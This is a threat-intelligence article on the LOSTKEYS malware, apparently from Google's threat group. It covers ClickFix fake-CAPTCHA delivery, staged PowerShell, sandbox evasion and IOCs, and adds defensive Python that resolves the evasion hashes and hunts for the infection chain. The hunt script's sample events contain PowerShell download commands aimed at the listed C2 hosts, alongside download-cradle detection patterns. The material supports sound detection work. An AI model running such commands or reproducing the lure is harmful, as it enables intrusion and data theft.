The Google Threat Intelligence Group (GTIG) has uncovered a sophisticated new malware dubbed LOSTKEYS, attributed to the Russian government-backed threat actor COLDRIVER, also known as UNC4057, Star Blizzard, and Callisto.
Observed in campaigns in January, March, and April 2025, with possibly related samples dating back to December 2023, LOSTKEYS marks a notable evolution in COLDRIVER's toolkit, which has historically centered on credential phishing against high-value targets such as NATO governments, NGOs, journalists, think tanks, and former intelligence officers.
The malware steals files whose extensions match a hardcoded list from a hardcoded set of directories, and also collects system information and the list of running processes. That makes it a severe threat to the individuals and organizations it is aimed at, particularly those linked to Ukraine or to Western governments.
GTIG notes that COLDRIVER’s primary objective appears to be intelligence collection aligned with Russia’s strategic interests, occasionally escalating to hack-and-leak operations, as seen in past campaigns targeting UK officials and NGOs.
Multi-Stage Infection Chain Evades Detection
LOSTKEYS is delivered through a multi-stage infection chain that begins with a deceptive lure: a fake CAPTCHA on a malicious website.

Once the user "verifies" the CAPTCHA, the page copies PowerShell code to the clipboard and instructs the user to paste and run it in the Windows "Run" dialog (Win+R). This technique, known as "ClickFix", is used by both advanced persistent threats (APTs) and financially motivated actors because the victim, not an exploit, launches the first stage.
The pasted PowerShell fetches a second stage from a hardcoded IP address (165.227.148[.]68). That stage performs device evasion: it computes the MD5 hash of the display resolution and halts if the digest matches specific hardcoded values, so that the chain does not proceed on virtual machines (VMs) and sandboxes configured with those resolutions.
Later stages retrieve Base64-encoded PowerShell scripts and a Visual Basic Script (VBS) decoder. The final LOSTKEYS payload is decoded with a substitution cipher whose key is unique to each infection chain, so captured artifacts from one victim cannot be used directly to decode another's.

This layered, per-victim staging is designed to frustrate detection and analysis and to ensure the final payload reaches only selected high-value targets.
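The display-resolution check above is the kind of gate an analyst has to understand before detonating the sample: the script carries only MD5 digests, so the blocked resolutions are not visible in the code. The following is an added example, not code from GTIG or from the LOSTKEYS sample, showing how to resolve such a digest list back to plain resolutions by hashing a candidate list. The digest blocklist and the "WIDTHxHEIGHT" string format are assumptions for illustration; the real script's values and formatting are not given on this page.

```python
"""Resolve a display-resolution MD5 blocklist back to the resolutions it blocks.

Added example (not GTIG's or the malware's code). Assumptions, labelled:
  - the evasion check hashes the string "WIDTHxHEIGHT" (assumed format);
  - HYPOTHETICAL_BLOCKLIST stands in for the digests carved from the script.
"""
import hashlib

# Constructed candidate list: resolutions common in default VM/sandbox
# configurations, plus a few ordinary desktop ones.
CANDIDATE_RESOLUTIONS = [
    "640x480", "800x600", "1024x768", "1280x720", "1280x800", "1280x1024",
    "1366x768", "1440x900", "1600x900", "1680x1050", "1920x1080", "2560x1440",
]


def resolution_md5(width: int, height: int) -> str:
    """MD5 of the resolution string in the assumed WIDTHxHEIGHT format."""
    return hashlib.md5(f"{width}x{height}".encode("ascii")).hexdigest()


# Hypothetical blocklist standing in for the hardcoded digests; built from
# two VM-typical resolutions so that the example is self-contained.
HYPOTHETICAL_BLOCKLIST = {
    resolution_md5(1024, 768),
    resolution_md5(800, 600),
}


def resolve_blocklist(blocklist, candidates=CANDIDATE_RESOLUTIONS):
    """Map each digest in the blocklist to the candidate resolution that
    produces it. Returns {digest: "WxH"}; digests that no candidate matches
    are simply absent, which tells the analyst to widen the candidate list."""
    table = {}
    for res in candidates:
        width, height = (int(part) for part in res.split("x"))
        table[resolution_md5(width, height)] = res
    return {digest: table[digest] for digest in blocklist if digest in table}


def gate_would_halt(width: int, height: int, blocklist) -> bool:
    """Mirror the evasion gate: True means the stage would stop on a display
    of this size, so the analysis VM should be set to something else."""
    return resolution_md5(width, height) in blocklist


if __name__ == "__main__":
    for digest, res in resolve_blocklist(HYPOTHETICAL_BLOCKLIST).items():
        print(f"{digest} blocks {res}")
    print("1920x1080 halts:", gate_would_halt(1920, 1080, HYPOTHETICAL_BLOCKLIST))
```

The practical consequence for a sandbox operator is that the analysis VM's display should be set to a resolution whose digest is not in the list; hashing a candidate list is cheap, and an unresolved digest means the candidate list needs more entries rather than that the check is unbreakable.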
GTIG also identified older LOSTKEYS samples from December 2023, disguised as Portable Executable (PE) files mimicking the Maltego software, though their direct link to COLDRIVER remains under investigation.
To counter such threats, Google has added the findings to Safe Browsing, sent government-backed attacker alerts to at-risk Gmail and Workspace users, and recommends enabling Enhanced Safe Browsing in Chrome and keeping devices updated.
Indicators of Compromise (IOCs)
| Description | Indicator (MD5 hash, IP address, or domain; network indicators defanged) |
|---|---|
| Stage 1 – Fake CAPTCHA PowerShell | 13f7599c94b9d4b028ce02397717a128 |
| Stage 2 – Device Evasion | 4c7accba35edd646584bb5a40ab78f96 |
| Stage 3 – Payload Retrieval Key | 6b85d707c23d68f9518e757cc97adb20 |
| Decoder Script Key | 3233668d2e4a80b17e6357177b53539d |
| Final Payload (Encoded) | 6bc411d562456079a8f1e38f3473c33a |
| Final Payload (Decoded) | 28a0596b9c62b7b7aca9cac2a07b0671 |
| C2 Server IP | 165.227.148[.]68 |
| C2 Domain | cloudmediaportal[.]com |
| C2 Domain (Dec 2023) | njala[.]dev |
| C2 IP (Dec 2023) | 80.66.88[.]67 |
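The ClickFix step and the IOC table together give a SOC two concrete hunts: PowerShell spawned by explorer.exe (the process that hosts the Run dialog) with a download cradle on its command line, and any process that references the listed C2 hosts. The following is an added example, not code from GTIG or from this article, that runs both checks over constructed process-creation events and matches file digests against the table. The indicators are copied from the table above; the event lines, the simplified `key="value"` event format, and the sample file contents are constructed for the example.

```python
"""Hunt for the LOSTKEYS ClickFix chain using the IOCs from the table above.

Added example, not GTIG's code. The IOC values are from the article; the
event format (key="value" pairs, Sysmon/4688-like) and SAMPLE_EVENTS are
constructed assumptions so the script runs offline.
"""
import hashlib
import re

IOC_MD5 = {
    "13f7599c94b9d4b028ce02397717a128": "Stage 1 - Fake CAPTCHA PowerShell",
    "4c7accba35edd646584bb5a40ab78f96": "Stage 2 - Device Evasion",
    "6b85d707c23d68f9518e757cc97adb20": "Stage 3 - Payload Retrieval Key",
    "3233668d2e4a80b17e6357177b53539d": "Decoder Script Key",
    "6bc411d562456079a8f1e38f3473c33a": "Final Payload (Encoded)",
    "28a0596b9c62b7b7aca9cac2a07b0671": "Final Payload (Decoded)",
}
IOC_NETWORK_DEFANGED = [
    "165.227.148[.]68", "cloudmediaportal[.]com", "njala[.]dev", "80.66.88[.]67",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ("[.]") back into a matchable string."""
    return indicator.replace("[.]", ".")


IOC_NETWORK = sorted(refang(i) for i in IOC_NETWORK_DEFANGED)

# PowerShell download cradles a pasted ClickFix one-liner typically uses.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient)\b",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Parse the assumed key="value" event layout into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def detect_clickfix(line: str) -> list:
    """Return the reasons an event is suspicious; an empty list means clean."""
    ev = parse_event(line)
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    # The Run dialog is hosted by explorer.exe, so a command pasted there runs
    # as a child of explorer rather than of a terminal, script host or installer.
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("powershell download cradle launched from explorer.exe (Run dialog)")
        if HIDDEN_WINDOW.search(cmd):
            reasons.append("hidden window requested")
    for ioc in IOC_NETWORK:
        if ioc in cmd:
            reasons.append(f"command line references known C2 {ioc}")
    return reasons


def hunt(events) -> dict:
    """Index of every suspicious event mapped to its reasons."""
    return {i: r for i, line in enumerate(events) if (r := detect_clickfix(line))}


def hash_match(blob: bytes):
    """Label from the IOC table if the blob's MD5 is listed, else None."""
    return IOC_MD5.get(hashlib.md5(blob).hexdigest())


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    r'EventID="1" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -w hidden -c iwr http://165.227.148.68/ -UseBasicParsing"',
    r'EventID="1" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\PowerShell\7\pwsh.exe" CommandLine="powershell -File C:\Scripts\backup.ps1"',
    r'EventID="1" Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="cmd /c dir"',
    r'EventID="1" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -c Invoke-RestMethod https://cloudmediaportal.com/"',
]

if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
    print(hash_match(b"constructed benign content"))
```

On a suspected host, the command the user pasted into the Run dialog is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside process-creation telemetry; the explorer.exe-to-powershell.exe rule above will also fire on some legitimate admin habits, so treat the cradle and the C2 match as the confirming signals.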